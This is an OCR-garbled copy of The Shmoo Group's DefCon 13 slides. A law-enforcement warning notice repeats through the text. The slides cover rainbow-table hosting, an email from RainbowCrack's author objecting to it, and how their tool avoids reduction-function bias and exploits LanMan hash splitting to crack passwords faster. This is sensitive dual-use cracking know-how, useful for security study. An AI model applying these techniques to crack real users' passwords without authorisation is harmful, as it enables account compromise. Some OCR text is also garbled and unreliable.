NOTICE TO LAW 
ENFORCEMENT 
AGENTS 



The owners and users of this 
system are exercising First 
Amendment rights 

Some material on this system is 
in preparation for public 
dissemination and is "wot* 
product material” protected 
under The First Amendment 
Privacy Protection Act of 1980 
(USC 42. Section 2000aa). 
Note that this is a civil statute 
Violation of this statute by law 
enforcement agents is very 
likely to result in a civil suit as 
provided Section 2000aa-6 
Each and every person who 
has "work product material" 
stored on this system is entitled 
to recover at least minimum 
damages of $1000 plus all legal 
expenses Agents in some 
states may not be protected 
from personal civil liability if 
they violate this statute 



Shmoo-Fu: Hacker Goo, 
Goofs, and Gear with the 



In addition, there is email, i.e., 
"stored electronic 

communications" as defined by 
the Electronic Communications 
Privacy Act (EC PA) which has 
been in storage less than 180 
days on this system Such 
stored electronic 

communications are protected 
by the ECPA from seizure or 
even ‘preventing authorized 
access without a warrant 
specific to each person's email. 
Seizing the computer where 
this email resides would 
prevent such authorized 
access There are civil actions 
which may be taken against law 
enforcement agents under 
provision of the Act You can 
find them in USC 18. 2707 On 
this system you can expect 
multiple people to have stored 
email Each of them is entitled 
to collect SI 000 plus all legal 
expenses for violations of 
Section 2700 and 2703 Please 
ensure you have appropriate 
warrants before seizing this 
equipment 



Shmoo 



The Shmoo Group 
www.shmoo.com 
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Stickers anyone? 
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What's up Shmoo? 

Howdy & introductions... 

Our festivities will include: 

- Super Spy Stuff 

- IDN Fallout & Homograph Attacks 
for Personal Identities 

- Revving Up Rainbow Tables 

- Rogue Squadron & EAP Peeking 

- Shooting Your Security Wad 

- Don't Try This at Home 

- And MORE! 
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in preparation for public 
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(USC 42, Section 2000aa), 
Note that this is a civil statute 
Violation of this statute by law 
enforcement agents is very 
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Each and every person who 
has "work product material" 
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warrants before seizing this 
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Super Spy Stuff 

Robots got boring, so Pablos 
starting hanging out with models 
after his chic hacker photo shoot 
in FHM. 

The result was nothing short of 
spectacular, as the fashionable 
cell-phone stowaway strifes hot 
women face were finally 
addressed. 
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And now... 
Pablos. 
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DefCon 13 



Hmmm. 

Saving the World 



vs 

Avoiding 

Pound Me in the As 



Prison? 
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under The First Amendment 
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fjj&s? 
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IDN Fallout 

At ShmooCon 2005, Eric 
Johansen dropped the browser 
bomb regarding IDN issues. 

The press ran with it a bit. 

The folks responsible for IDN 
ranted for a bit. 

But did anything concrete occur? 
And where are we now? 
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Dan Moniz goes crazy... 
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rainbowtables . shmoo . com 

• We think rainbow tables are neat. 

• Just for fun, we started hosting 
rainbow tables that we had 
generated. 

- LanMan 

- Via Bittorrent 

- FREE 

• Some people liked that. 

• Some people didn't... 



Yay! 
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multiple people to have stored 
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to collect SI 000 plus all legal 
expenses for violations of 
Section 2700 and 2703 Please 
ensure you have appropriate 
warrants before seizing this 
equipment 



Forwarded message 

From: Zhu Shuanglei <shuanglei@hotmail . com> 
Date: Mar 10, 2005 12:42 AM 
Subject: About your shmoo site 
To: beetle@shmoo.com 



Hi, 

I am Zhu Shuanglei, the author of RainbowCrack software. I notice you are 
offering free BitTorrent links on your website for the rainbow tables. For 

those guys selling the table without permission from me, they are not welcome. 
But you are worse. 

As you may know, I develop the rainbowcrack tool and release it the the public 
for free. I just want to introduce the technique to the world and those need it 
can benifit from this software. If I sell the tables, I am only making some 
money for my work and for the fee of hosting my website and for my computing 
resource. This should be quite reasonable. I am not a business man, if I am 
there will not be the source code or table generation tool free on the net and I 
can make a lot of money. 

Are you feeling you are cool "Because knowing all passwords is cooler than 
trying to crack one. ;)". All over the world there will be a lot of guys can do 
what you do, they aren't. Do you know why? To show off prove neither your 
ability nor your knowledge. 

If possible, please keep honour of my intellectual property of this software, 
and let those need the tables to generate by themself. If everyone act like you 
there will be no reason for me to develop this software further or develop 
other useful software. Or I will never release anything useful to the public. 

Don't be crazy any more! 

Best Regards, 







/A 



Zhu Shuanglei 
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ENFORCEMENT 
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The owners and users of this 
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Amendment rights 

Some material on this system is 
in preparation for public 
dissemination and is "wot* 
product material" protected 
under The First Amendment 
Privacy Protection Act of 1980 
(USC 42, Section 2000aa), 
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enforcement agents is very 
likely to result in a civil suit as 
provided Section 2000aa-6 
Each and every person who 
has "work product matenal" 
stored on this system is entitled 
to recover at least minimum 
damages of $1000 plus all legal 
expenses Agents in some 
states may not be protected 
from personal civil liability if 
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In addition, there is email, i.e., 
"stored electronic 

communications" as defined by 
the Electronic Communications 
Privacy Act (EC PA) which has 
been in storage less than 180 
days on this system Such 
stored electronic 

communications are protected 
by the ECPA from seizure or 
even ‘preventing authorized 
access without a warrant 
specific to each person's email 
Seizing the computer where 
this email resides would 
prevent such authorized 
access There are civil actions 
which may be taken against law 
enforcement agents under 
provision of the Act You can 
find them in USC 18. 2707 On 
this system you can expect 
multiple people to have stored 
email Each of them is entitled 
to collect SI 000 plus all legal 
expenses for violations of 
Section 2700 and 2703 Please 
ensure you have appropriate 
warrants before seizing this 
equipment 



Revving Up Rainbow Tables 

• So, badass LanMan tables are 
online now via Bittorrent, and 
still for FREE. 

lm_alpha-numeric-symbol32-space. torrent 
- Join the 43.9 GB torrent! ! ! 

• Meanwhile, Dan decided to "be 
crazy” a bit more. 

• We don't need your stinkin 1 code, 
Zhu! 










• And Snax says, “FUCK OFF!" 
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NOTICE TO LAW 
ENFORCEMENT 
AGENTS 



The owners and users of this 
system are exercising First 
Amendment rights 

Some material on this system is 
in preparation for public 
dissemination and is "wot* 
product material” protected 
under The First Amendment 
Privacy Protection Act of 1980 
(USC 42. Section 2000aa). 
Note that this is a civil statute 
Violation of this statute by law 
enforcement agents is very 
likely to result in a civil suit as 
provided Section 2000aa-6 
Each and every person who 
has "work product material" 
stored on this system is entitled 
to recover at least minimum 
damages of $1000 plus all legal 
expenses Agents in some 
states may not be protected 
from personal civil liability if 
they violate this statute 

In addition, there is email, i.e., 
"stored electronic 

communications" as defined by 
the Electronic Communications 
Privacy Act (EC PA) which has 
been in storage less than 180 
days on this system Such 
stored electronic 

communications are protected 
by the ECPA from seizure or 
even ‘preventing authorized 
access without a warrant 
specific to each person's email. 
Seizing the computer where 
this email resides would 
prevent such authorized 
access There are civil actions 
which may be taken against law 
enforcement agents under 
provision of the Act You can 
find them in USC 18. 2707 On 
this system you can expect 
multiple people to have stored 
email Each of them is entitled 
to collect SI 000 plus all legal 
expenses for violations of 
Section 2700 and 2703 Please 
ensure you have appropriate 
warrants before seizing this 
equipment 



Unnamed Project 

Dan Moniz 

Rev. Dr. Patrick Stach 
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The owners and users of this 
system are exercising First 
Amendment rights 

Some material on this system is 
in preparation for public 
dissemination and is "wot* 
product material" protected 
under The First Amendment 
Privacy Protection Act of 1980 
(USC 42, Section 2000aa), 
Note that this is a civil statute 
Violation of this statute by law 
enforcement agents is very 
likely to result in a civil suit as 
provided Section 2000aa-6 
Each and every person who 
has "work product matenal" 
stored on this system is entitled 
to recover at least minimum 
damages of $1000 plus all legal 
expenses Agents in some 
states may not be protected 
from personal civil liability if 
they violate this statute. 

In addition, there is email, i.e., 
"stored electronic 

communications" as defined by 
the Electronic Communications 
Privacy Act (EC PA) which has 
been in storage less than 180 
days on this system Such 
stored electronic 

communications are protected 
by the ECPA from seizure or 
even ‘preventing authorized 
access without a warrant 
specific to each person's email 
Seizing the computer where 
this email resides would 
prevent such authorized 
access There are civil actions 
which may be taken against law 
enforcement agents under 
provision of the Act You can 
find them in USC 18. 2707 On 
this system you can expect 
multiple people to have stored 
email Each of them is entitled 
to collect SI 000 plus all legal 
expenses for violations of 
Section 2700 and 2703 Please 
ensure you have appropriate 
warrants before seizing this 
equipment 



Improving on 
RainbowCrack 

We started out trying to optimize 
RainbowCrack. . . 

But then we found out that it is 
teh suck. 

So we changed our approach and 
made a new tool. 

Doesn't have a name... yet. 
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The owners and users of this 
system are exercising First 
Amendment rights 

Some material on this system is 
in preparation for public 
dissemination and is "wot* 
product material" protected 
under The First Amendment 
Privacy Protection Act of 1980 
(USC 42, Section 2000aa), 
Note that this is a civil statute 
Violation of this statute by law 
enforcement agents is very 
likely to result in a civil suit as 
provided Section 2000aa-6 
Each and every person who 
has "work product matenal" 
stored on this system is entitled 
to recover at least minimum 
damages of $1000 plus all legal 
expenses Agents in some 
states may not be protected 
from personal civil liability if 
they violate this statute. 

In addition, there is email, i.e., 
"stored electronic 

communications" as defined by 
the Electronic Communications 
Privacy Act (EC PA) which has 
been in storage less than 180 
days on this system Such 
stored electronic 

communications are protected 
by the ECPA from seizure or 
even ‘preventing authorized 
access without a warrant 
specific to each person's email 
Seizing the computer where 
this email resides would 
prevent such authorized 
access There are civil actions 
which may be taken against law 
enforcement agents under 
provision of the Act You can 
find them in USC 18. 2707 On 
this system you can expect 
multiple people to have stored 
email Each of them is entitled 
to collect SI 000 plus all legal 
expenses for violations of 
Section 2700 and 2703 Please 
ensure you have appropriate 
warrants before seizing this 
equipment 



Problems with 
RainbowCrack 

Reduction function bias 

If your keyspace is 6 valid inputs, 
and you have 2^4 number of 
outputs, the reduction that 
RainbowCrack (slightly 
simplified) does is: 

(total num of outputs) mod (total num 
of inputs) = bias marker 
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NOTICE TO LAW 
ENFORCEMENT 
AGENTS 



The owners and users of this 
system are exercising First 
Amendment rights 

Some material on this system is 
in preparation for public 
dissemination and is "wot* 
product material" protected 
under The First Amendment 
Privacy Protection Act of 1980 
(USC 42, Section 2000aa), 
Note that this is a civil statute 
Violation of this statute by law 
enforcement agents is very 
likely to result in a civil suit as 
provided Section 2000aa-6 
Each and every person who 
has "work product matenal" 
stored on this system is entitled 
to recover at least minimum 
damages of $1000 plus all legal 
expenses Agents in some 
states may not be protected 
from personal civil liability if 
they violate this statute. 

In addition, there is email, i.e., 
"stored electronic 

communications" as defined by 
the Electronic Communications 
Privacy Act (EC PA) which has 
been in storage less than 180 
days on this system Such 
stored electronic 

communications are protected 
by the ECPA from seizure or 
even ‘preventing authorized 
access without a warrant 
specific to each person's email 
Seizing the computer where 
this email resides would 
prevent such authorized 
access There are civil actions 
which may be taken against law 
enforcement agents under 
provision of the Act You can 
find them in USC 18. 2707 On 
this system you can expect 
multiple people to have stored 
email Each of them is entitled 
to collect SI 000 plus all legal 
expenses for violations of 
Section 2700 and 2703 Please 
ensure you have appropriate 
warrants before seizing this 
equipment 



Example of Reduction 
Function Bias 



mod 6 = 0 


8 mod 6 = 2 


mod 6 = 1 


9 mod 6 = 3 


mod 6 = 2 


10 mod 6 = 4 


mod 6 = 3 


11 mod 6 = 5 


mod 6 = 4 


12 mod 6 = 0 


mod 6= 5 


13 mod 6 = 1 


mod 6 = 0 


14 mod 6 = 2 


mod 6 = 1 


15 mod 6 = 3 



That's a lot of modulo 
arithmetic. You'll notice 
that there are 3 of every 
value except 4 and 5. 

We only have two of 
those. 

Say that LM had only 6 
possible inputs. Say that 
the algorithm (which in 
LM is DES) has up to 
2^4 outputs (16). 
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NOTICE TO LAW 
ENFORCEMENT 
AGENTS 



The owners and users of this 
system are exercising First 
Amendment rights 

Some material on this system is 
in preparation for public 
dissemination and is "wot* 
product material" protected 
under The First Amendment 
Privacy Protection Act of 1980 
(USC 42, Section 2000aa), 
Note that this is a civil statute 
Violation of this statute by law 
enforcement agents is very 
likely to result in a civil suit as 
provided Section 2000aa-6 
Each and every person who 
has "work product matenal" 
stored on this system is entitled 
to recover at least minimum 
damages of $1000 plus all legal 
expenses Agents in some 
states may not be protected 
from personal civil liability if 
they violate this statute. 

In addition, there is email, i.e., 
"stored electronic 

communications" as defined by 
the Electronic Communications 
Privacy Act (EC PA) which has 
been in storage less than 180 
days on this system Such 
stored electronic 

communications are protected 
by the ECPA from seizure or 
even ‘preventing authorized 
access without a warrant 
specific to each person's email 
Seizing the computer where 
this email resides would 
prevent such authorized 
access There are civil actions 
which may be taken against law 
enforcement agents under 
provision of the Act You can 
find them in USC 18. 2707 On 
this system you can expect 
multiple people to have stored 
email Each of them is entitled 
to collect SI 000 plus all legal 
expenses for violations of 
Section 2700 and 2703 Please 
ensure you have appropriate 
warrants before seizing this 
equipment 



Reduction Function Bias 

Continued 

By taking an arbitrary random output 
from the algorithm (we can assume that 
the algorithm output is random) and 
modulo it by 6, there's a better chance of 
the input values being below the bias 
marker than above. 

Values 0 to 3 have a better chance of 
being picked at random due to this than 
the 4-5 values as the next input. 
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NOTICE TO LAW 
ENFORCEMENT 
AGENTS 



The owners and users of this 
system are exercising First 
Amendment rights 

Some material on this system is 
in preparation for public 
dissemination and is "wot* 
product material" protected 
under The First Amendment 
Privacy Protection Act of 1980 
(USC 42, Section 2000aa), 
Note that this is a civil statute 
Violation of this statute by law 
enforcement agents is very 
likely to result in a civil suit as 
provided Section 2000aa-6 
Each and every person who 
has "work product matenal" 
stored on this system is entitled 
to recover at least minimum 
damages of $1000 plus all legal 
expenses Agents in some 
states may not be protected 
from personal civil liability if 
they violate this statute. 



The Real Bias Problem 

E 69i 

i = 0 



In addition, there is email, i.e , 
"stored electronic 

communications" as defined by 
the Electronic Communications 
Privacy Act (ECPA) which has 
been in storage less than 180 
days on this system Such 
stored electronic 

communications are protected 
by the ECPA from seizure or 
even ‘preventing authorized 
access without a warrant 
specific to each person's email 
Seizing the computer where 
this email resides would 
prevent such authorized 
access There are civil actions 
which may be taken against law 
enforcement agents under 
provision of the Act You can 
find them in USC 18. 2707 On 
this system you can expect 
multiple people to have stored 
email Each of them is entitled 
to collect SI 000 plus all legal 
expenses for violations of 
Section 2700 and 2703 Please 
ensure you have appropriate 
warrants before seizing this 
equipment 







This Riemann sum is not an integral 
factor of 2^64 just as 6 is not an 
integral factor of 16. 

This modulo arithmetic has a bias. 

You can assume the output of DES is 
statistically random, or at least 
random enough that the bias would 
still be present. 
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NOTICE TO LAW 
ENFORCEMENT 
AGENTS 



The owners and users of this 
system are exercising First 
Amendment rights 

Some material on this system is 
in preparation for public 
dissemination and is "wot* 
product material" protected 
under The First Amendment 
Privacy Protection Act of 1980 
(USC 42, Section 2000aa), 
Note that this is a civil statute 
Violation of this statute by law 
enforcement agents is very 
likely to result in a civil suit as 
provided Section 2000aa-6 
Each and every person who 
has "work product matenal" 
stored on this system is entitled 
to recover at least minimum 
damages of $1000 plus all legal 
expenses Agents in some 
states may not be protected 
from personal civil liability if 
they violate this statute. 

In addition, there is email, i.e., 
"stored electronic 

communications" as defined by 
the Electronic Communications 
Privacy Act (EC PA) which has 
been in storage less than 180 
days on this system Such 
stored electronic 

communications are protected 
by the ECPA from seizure or 
even ‘preventing authorized 
access without a warrant 
specific to each person's email 
Seizing the computer where 
this email resides would 
prevent such authorized 
access There are civil actions 
which may be taken against law 
enforcement agents under 
provision of the Act You can 
find them in USC 18. 2707 On 
this system you can expect 
multiple people to have stored 
email Each of them is entitled 
to collect SI 000 plus all legal 
expenses for violations of 
Section 2700 and 2703 Please 
ensure you have appropriate 
warrants before seizing this 
equipment 






Why this matters 

• n = the floored result of (total num of outputs)/ 
(total num of inputs) 

• We'll add 1 if n is below the bias marker to 
represent the extra chance it has due to the bias 

• (l+n)/(total num of outputs) = chance of hitting 
any one given key out of the input range 

• n/(total num of outputs) = chance of hitting any 
one given key out of the input range 

• Values below the bias marker are unfairly 
weighted and are more likely to be inputs to the 
rainbow chain generation! 
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NOTICE TO LAW 
ENFORCEMENT 
AGENTS 



The owners and users of this 
system are exercising First 
Amendment rights 

Some material on this system is 
in preparation for public 
dissemination and is "worts 
product material" protected 
under The First Amendment 
Privacy Protection Act of 1980 
(USC 42. Section 2000aa). 
Note that this is a civil statute 
Violation of this statute by law 
enforcement agents is very 
likely to result in a civil suit as 
provided Section 2000aa-6 
Each and every person who 
has "work product matenal" 
stored on this system is entitled 
to recover at least minimum 
damages of $1000 plus all legal 
expenses Agents in some 
states may not be protected 
from personal civil liability if 
they violate this statute 

In addition, there is email, i.e , 
"stored electronic 

communications" as defined by 
the Electronic Communications 
Privacy Act (ECPA) which has 
been in storage less than 180 
days on this system Such 
stored electronic 

communications are protected 
by the ECPA from seizure or 
even ‘preventing authorized 
access without a warrant 
specific to each person's email 
Seizing the computer where 
this email resides would 
prevent such authorized 
access There are civil actions 
which may be taken against law 
enforcement agents under 
provision of the Act You can 
find them in USC 18. 2707 On 
this system you can expect 
multiple people to have stored 
email Each of them is entitled 
to collect SI 000 plus all legal 
expenses for violations of 
Section 2700 and 2703 Please 
ensure you have appropriate 
warrants before seizing this 
equipment 







Our Generation Technique 

(how we avoid bias) 

• We start generating at the last 
possible input and walk towards the 
first input. 

• As we generate we use a bitmask, so 
we can determine if we have 
computed the key or not. We have 
100% verified keyspace because 
everything is accounted for. 

• At 1 bit per input it requires 768 GB of 
disk space if we were to do it on one 
machine. 
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NOTICE TO LAW 
ENFORCEMENT 
AGENTS 



The owners and users of this 
system are exercising First 
Amendment rights 

Some material on this system is 
in preparation for public 
dissemination and is "worts 
product material" protected 
under The First Amendment 
Privacy Protection Act of 1980 
(USC 42. Section 2000aa). 
Note that this is a civil statute 
Violation of this statute by law 
enforcement agents is very 
likely to result in a civil suit as 
provided Section 2000aa-6 
Each and every person who 
has "work product matenal" 
stored on this system is entitled 
to recover at least minimum 
damages of $1000 plus all legal 
expenses Agents in some 
states may not be protected 
from personal civil liability if 
they violate this statute 

In addition, there is email, i.e , 
"stored electronic 

communications" as defined by 
the Electronic Communications 
Privacy Act (ECPA) which has 
been in storage less than 180 
days on this system Such 
stored electronic 

communications are protected 
by the ECPA from seizure or 
even ‘preventing authorized 
access without a warrant 
specific to each person's email 
Seizing the computer where 
this email resides would 
prevent such authorized 
access There are civil actions 
which may be taken against law 
enforcement agents under 
provision of the Act You can 
find them in USC 18. 2707 On 
this system you can expect 
multiple people to have stored 
email Each of them is entitled 
to collect SI 000 plus all legal 
expenses for violations of 
Section 2700 and 2703 Please 
ensure you have appropriate 
warrants before seizing this 
equipment 







Our Badass Sorting-Fu 

We separate out anything less 
than or equal to 6 characters. 7 
character keyspace is one table, 

5-6 keyspace is another 

We do this so that you can detect 
the length of the password 

LanMan primer: take 14 bytes of 
input and split it into two 7 byte 
parts, hash them independently 

DefCon 13 




NOTICE TO LAW 
ENFORCEMENT 
AGENTS 



The owners and users of this 
system are exercising First 
Amendment rights 

Some material on this system is 
in preparation for public 
dissemination and is "worts 
product material" protected 
under The First Amendment 
Privacy Protection Act of 1980 
(USC 42. Section 2000aa). 
Note that this is a civil statute 
Violation of this statute by law 
enforcement agents is very 
likely to result in a civil suit as 
provided Section 2000aa-6 
Each and every person who 
has "work product matenal" 
stored on this system is entitled 
to recover at least minimum 
damages of $1000 plus all legal 
expenses Agents in some 
states may not be protected 
from personal civil liability if 
they violate this statute 

In addition, there is email, i.e , 
"stored electronic 

communications" as defined by 
the Electronic Communications 
Privacy Act (ECPA) which has 
been in storage less than 180 
days on this system Such 
stored electronic 

communications are protected 
by the ECPA from seizure or 
even ‘preventing authorized 
access without a warrant 
specific to each person's email 
Seizing the computer where 
this email resides would 
prevent such authorized 
access There are civil actions 
which may be taken against law 
enforcement agents under 
provision of the Act You can 
find them in USC 18. 2707 On 
this system you can expect 
multiple people to have stored 
email Each of them is entitled 
to collect SI 000 plus all legal 
expenses for violations of 
Section 2700 and 2703 Please 
ensure you have appropriate 
warrants before seizing this 
equipment 







LanMan Hashing 
Examples 

•Say you have a password "dog" 

dog = DOG\O\0\O\0\O\0\O\0\O\0 

• Which goes to... 

DOG\0\O\0\O \0\0\0\0\0\0\0 

•You can detect that the first half 
is 7 characters or less because 
the second half is the null 
password hash. 
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NOTICE TO LAW 
ENFORCEMENT 
AGENTS 



The owners and users of this 
system are exercising First 
Amendment rights 

Some material on this system is 
in preparation for public 
dissemination and is "worts 
product material" protected 
under The First Amendment 
Privacy Protection Act of 1980 
(USC 42. Section 2000aa). 
Note that this is a civil statute 
Violation of this statute by law 
enforcement agents is very 
likely to result in a civil suit as 
provided Section 2000aa-6 
Each and every person who 
has "work product matenal" 
stored on this system is entitled 
to recover at least minimum 
damages of $1000 plus all legal 
expenses Agents in some 
states may not be protected 
from personal civil liability if 
they violate this statute 

In addition, there is email, i.e , 
"stored electronic 

communications" as defined by 
the Electronic Communications 
Privacy Act (ECPA) which has 
been in storage less than 180 
days on this system Such 
stored electronic 

communications are protected 
by the ECPA from seizure or 
even ‘preventing authorized 
access without a warrant 
specific to each person's email 
Seizing the computer where 
this email resides would 
prevent such authorized 
access There are civil actions 
which rnay be taken against law 
enforcement agents under 
provision of the Act You can 
find them in USC 18. 2707 On 
this system you can expect 
multiple people to have stored 
email Each of them is entitled 
to collect SI 000 plus all legal 
expenses for violations of 
Section 2700 and 2703 Please 
ensure you have appropriate 
warrants before seizing this 
equipment 







LanMan Hashing 
Examples 

• Now with a password of "spamdadrulz"... 

spamdadrulz = SPAMDADRULZ\0\0\0 

• Which goes to... 

SPAMDAD RULZ\0\0\0 

•You know that this hash is 7 characters 
because the second half of the hash is not 
the null password hash. 

• This decreases the time spent looking 
through worthless hash values! 
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NOTICE TO LAW 
ENFORCEMENT 
AGENTS 



The owners and users of this 
system are exercising First 
Amendment rights 

Some material on this system is 
in preparation for public 
dissemination and is "wot* 
product material" protected 
under The First Amendment 
Privacy Protection Act of 1980 
(USC 42, Section 2000aa), 
Note that this is a civil statute 
Violation of this statute by law 
enforcement agents is very 
likely to result in a civil suit as 
provided Section 2000aa-6 
Each and every person who 
has "work product matenal" 
stored on this system is entitled 
to recover at least minimum 
damages of $1000 plus all legal 
expenses Agents in some 
states may not be protected 
from personal civil liability if 
they violate this statute. 

In addition, there is email, i.e., 
"stored electronic 

communications" as defined by 
the Electronic Communications 
Privacy Act (EC PA) which has 
been in storage less than 180 
days on this system Such 
stored electronic 

communications are protected 
by the ECPA from seizure or 
even ‘preventing authorized 
access without a warrant 
specific to each person's email 
Seizing the computer where 
this email resides would 
prevent such authorized 
access There are civil actions 
which may be taken against law 
enforcement agents under 
provision of the Act You can 
find them in USC 18. 2707 On 
this system you can expect 
multiple people to have stored 
email Each of them is entitled 
to collect SI 000 plus all legal 
expenses for violations of 
Section 2700 and 2703 Please 
ensure you have appropriate 
warrants before seizing this 
equipment 



RainbowCrack Loses 

RainbowCrack just generates 
random hashes. 

And has that reduction function 
bias problem... 

Bad + Suck = 14m3x0r! ! ! 
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NOTICE TO LAW 
ENFORCEMENT 
AGENTS 



The owners and users of this 
system are exercising First 
Amendment rights 

Some material on this system is 
in preparation for public 
dissemination and is "wot* 
product material" protected 
under The First Amendment 
Privacy Protection Act of 1980 
(USC 42, Section 2000aa), 
Note that this is a civil statute 
Violation of this statute by law 
enforcement agents is very 
likely to result in a civil suit as 
provided Section 2000aa-6 
Each and every person who 
has "work product matenal" 
stored on this system is entitled 
to recover at least minimum 
damages of $1000 plus all legal 
expenses Agents in some 
states may not be protected 
from personal civil liability if 
they violate this statute. 

In addition, there is email, i.e., 
"stored electronic 

communications" as defined by 
the Electronic Communications 
Privacy Act (EC PA) which has 
been in storage less than 180 
days on this system Such 
stored electronic 

communications are protected 
by the ECPA from seizure or 
even ‘preventing authorized 
access without a warrant 
specific to each person's email 
Seizing the computer where 
this email resides would 
prevent such authorized 
access There are civil actions 
which may be taken against law 
enforcement agents under 
provision of the Act You can 
find them in USC 18. 2707 On 
this system you can expect 
multiple people to have stored 
email Each of them is entitled 
to collect SI 000 plus all legal 
expenses for violations of 
Section 2700 and 2703 Please 
ensure you have appropriate 
warrants before seizing this 
equipment 



We Get Our Crack On 

rtcrack reads in as much of the 
hash table file that rtgen 
generates using the read ( ) 
syscall. 

It walks linearly checking to see 
if the endpoints match on the 
rainbow chains. 

This has O(n) complexity. 
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NOTICE TO LAW 
ENFORCEMENT 
AGENTS 



The owners and users of this 
system are exercising First 
Amendment rights 

Some material on this system is 
in preparation for public 
dissemination and is "worts 
product material" protected 
under The First Amendment 
Privacy Protection Act of 1980 
(USC 42. Section 2000aa). 
Note that this is a civil statute 
Violation of this statute by law 
enforcement agents is very 
likely to result in a civil suit as 
provided Section 2000aa-6 
Each and every person who 
has "work product matenal" 
stored on this system is entitled 
to recover at least minimum 
damages of $1000 plus all legal 
expenses Agents in some 
states may not be protected 
from personal civil liability if 
they violate this statute 

In addition, there is email, i.e , 
"stored electronic 

communications" as defined by 
the Electronic Communications 
Privacy Act (ECPA) which has 
been in storage less than 180 
days on this system Such 
stored electronic 

communications are protected 
by the ECPA from seizure or 
even ‘preventing authorized 
access without a warrant 
specific to each person's email 
Seizing the computer where 
this email resides would 
prevent such authorized 
access There are civil actions 
which may be taken against law 
enforcement agents under 
provision of the Act You can 
find them in USC 18. 2707 On 
this system you can expect 
multiple people to have stored 
email Each of them is entitled 
to collect SI 000 plus all legal 
expenses for violations of 
Section 2700 and 2703 Please 
ensure you have appropriate 
warrants before seizing this 
equipment 







We Get Our Crack On 

• We store the start point and the endpoints in 
separate files at corresponding offsets 

• Next we take the page size on x86 (4096 bytes) 
divided by the entry size (8) plus 1 (for the index) 
which equals 513 

• So every 513 th entry, after we've sorted them 
lowest to highest, is stored in a special index file 

• At crack time, we mmap ( ) the endpoint index file, 
and use divide and conquer (Fibonacci find) to 
find out if the endpoint is in this index file, or, if 
it's not, to which offset the endpoint is referenced 
in the master index file 
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NOTICE TO LAW 
ENFORCEMENT 
AGENTS 



The owners and users of this 
system are exercising First 
Amendment rights 

Some material on this system is 
in preparation for public 
dissemination and is "worts 
product material" protected 
under The First Amendment 
Privacy Protection Act of 1980 
(USC 42. Section 2000aa). 
Note that this is a civil statute 
Violation of this statute by law 
enforcement agents is very 
likely to result in a civil suit as 
provided Section 2000aa-6 
Each and every person who 
has "work product matenal" 
stored on this system is entitled 
to recover at least minimum 
damages of $1000 plus all legal 
expenses Agents in some 
states may not be protected 
from personal civil liability if 
they violate this statute 

In addition, there is email, i.e , 
"stored electronic 

communications" as defined by 
the Electronic Communications 
Privacy Act (ECPA) which has 
been in storage less than 180 
days on this system Such 
stored electronic 

communications are protected 
by the ECPA from seizure or 
even ‘preventing authorized 
access without a warrant 
specific to each person's email 
Seizing the computer where 
this email resides would 
prevent such authorized 
access There are civil actions 
which may be taken against law 
enforcement agents under 
provision of the Act You can 
find them in USC 18. 2707 On 
this system you can expect 
multiple people to have stored 
email Each of them is entitled 
to collect SI 000 plus all legal 
expenses for violations of 
Section 2700 and 2703 Please 
ensure you have appropriate 
warrants before seizing this 
equipment 







We Get Our Search On 

Thus, for each offset it has to 
read a max of one page of 
memory off of disk 

4096 bytes read to check 512 
entries 

This is Bayes trees, modified 

Patrick has a Doctorate of 
Divinity in Searching and Sorting 
from the Church of Knuth 
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NOTICE TO LAW 
ENFORCEMENT 
AGENTS 



The owners and users of this 
system are exercising First 
Amendment rights 

Some material on this system is 
in preparation for public 
dissemination and is "wot* 
product material" protected 
under The First Amendment 
Privacy Protection Act of 1980 
(USC 42, Section 2000aa), 
Note that this is a civil statute 
Violation of this statute by law 
enforcement agents is very 
likely to result in a civil suit as 
provided Section 2000aa-6 
Each and every person who 
has "work product matenal" 
stored on this system is entitled 
to recover at least minimum 
damages of $1000 plus all legal 
expenses Agents in some 
states may not be protected 
from personal civil liability if 
they violate this statute. 

In addition, there is email, i.e., 
"stored electronic 

communications" as defined by 
the Electronic Communications 
Privacy Act (EC PA) which has 
been in storage less than 180 
days on this system Such 
stored electronic 

communications are protected 
by the ECPA from seizure or 
even ‘preventing authorized 
access without a warrant 
specific to each person's email 
Seizing the computer where 
this email resides would 
prevent such authorized 
access There are civil actions 
which may be taken against law 
enforcement agents under 
provision of the Act You can 
find them in USC 18. 2707 On 
this system you can expect 
multiple people to have stored 
email Each of them is entitled 
to collect SI 000 plus all legal 
expenses for violations of 
Section 2700 and 2703 Please 
ensure you have appropriate 
warrants before seizing this 
equipment 



RainbowCrack Gets An L 

For Lame 

• Disk I/O costs as much CPU time 
as encryption in RainbowCrack, if 
not more. 

• RainbowCrack fails to account for 
this in their statistics. 
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NOTICE TO LAW 
ENFORCEMENT 
AGENTS 



The owners and users of this 
system are exercising First 
Amendment rights 

Some material on this system is 
in preparation for public 
dissemination and is "worts 
product material" protected 
under The First Amendment 
Privacy Protection Act of 1980 
(USC 42. Section 2000aa). 
Note that this is a civil statute 
Violation of this statute by law 
enforcement agents is very 
likely to result in a civil suit as 
provided Section 2000aa-6 
Each and every person who 
has "work product matenal" 
stored on this system is entitled 
to recover at least minimum 
damages of $1000 plus all legal 
expenses Agents in some 
states may not be protected 
from personal civil liability if 
they violate this statute 

In addition, there is email, i.e , 
"stored electronic 

communications" as defined by 
the Electronic Communications 
Privacy Act (ECPA) which has 
been in storage less than 180 
days on this system Such 
stored electronic 

communications are protected 
by the ECPA from seizure or 
even ‘preventing authorized 
access without a warrant 
specific to each person's email 
Seizing the computer where 
this email resides would 
prevent such authorized 
access There are civil actions 
which may be taken against law 
enforcement agents under 
provision of the Act You can 
find them in USC 18. 2707 On 
this system you can expect 
multiple people to have stored 
email Each of them is entitled 
to collect SI 000 plus all legal 
expenses for violations of 
Section 2700 and 2703 Please 
ensure you have appropriate 
warrants before seizing this 
equipment 







The Seekret Sauce 

Our code is implemented in C and 
assembly for the IA64 (Itanium2) 
and running on a classified 
number of processors. 

Thanks to SGI! 

We also have the generator 
implemented in VHDL to run as 
custom specialized hardware to 
run on Spartan-3 FPGAs. 
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NOTICE TO LAW 
ENFORCEMENT 
AGENTS 



The owners and users of this 
system are exercising First 
Amendment rights 

Some material on this system is 
in preparation for public 
dissemination and is "wot* 
product material” protected 
under The First Amendment 
Privacy Protection Act of 1980 
(USC 42. Section 2000aa). 
Note that this is a civil statute 
Violation of this statute by law 
enforcement agents is very 
likely to result in a civil suit as 
provided Section 2000aa-6 
Each and every person who 
has "work product material" 
stored on this system is entitled 
to recover at least minimum 
damages of $1000 plus all legal 
expenses Agents in some 
states may not be protected 
from personal civil liability if 
they violate this statute 

In addition, there is email, i.e., 
"stored electronic 

communications" as defined by 
the Electronic Communications 
